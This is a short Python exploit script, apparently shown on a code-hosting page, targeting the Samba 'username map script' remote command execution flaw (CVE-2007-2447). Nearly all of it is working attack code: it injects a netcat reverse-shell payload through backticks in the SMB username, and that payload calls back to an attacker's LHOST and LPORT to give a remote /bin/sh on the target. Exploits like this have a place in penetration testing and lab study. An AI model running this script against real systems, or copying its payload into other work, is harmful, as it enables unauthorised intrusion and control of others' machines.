-
Notifications
You must be signed in to change notification settings - Fork 2
/
UsernameMapScript.py
36 lines (30 loc) · 1.12 KB
/
UsernameMapScript.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
#!/usr/bin/python
'''
Title: UsernameMapScript.py
Description: Exploits RCE vulnerability in Samba v 3.0.20-3.0.25rc3, through username map script configuration and
sends a reverse shell to the attacker.
Service: Samba versions 3.0.20 to 3.0.25rc3
Reference: CVE-2007-2447, https://www.exploit-db.com/exploits/16320
Author: pwnd-root
'''
import sys
from smb.SMBConnection import SMBConnection
def exploit (rhost, rport, lhost, lport):
payload = 'mkfifo /tmp/hago; nc ' + lhost + ' ' + lport + ' 0</tmp/hago | /bin/sh >/tmp/hago 2>&1; rm /tmp/hago'
username = "/=`nohup " + payload + "`"
conn = SMBConnection (username, "", "", "")
try:
conn.connect (rhost, int (rport), timeout = 1)
except:
print ('[+] Payload was sent')
print ('[*] CVE-2007-2447')
if len (sys.argv) != 5:
print ("[-] usage: python " + sys.argv [0] + " <RHOST> <RPORT> <LHOST> <LPORT>")
print ("Enusre netcat listener is running")
else:
rhost = sys.argv [1]
rport = sys.argv [2]
lhost = sys.argv [3]
lport = sys.argv [4]
print ("[+] Connecting to " + rhost)
exploit (rhost, rport, lhost, lport)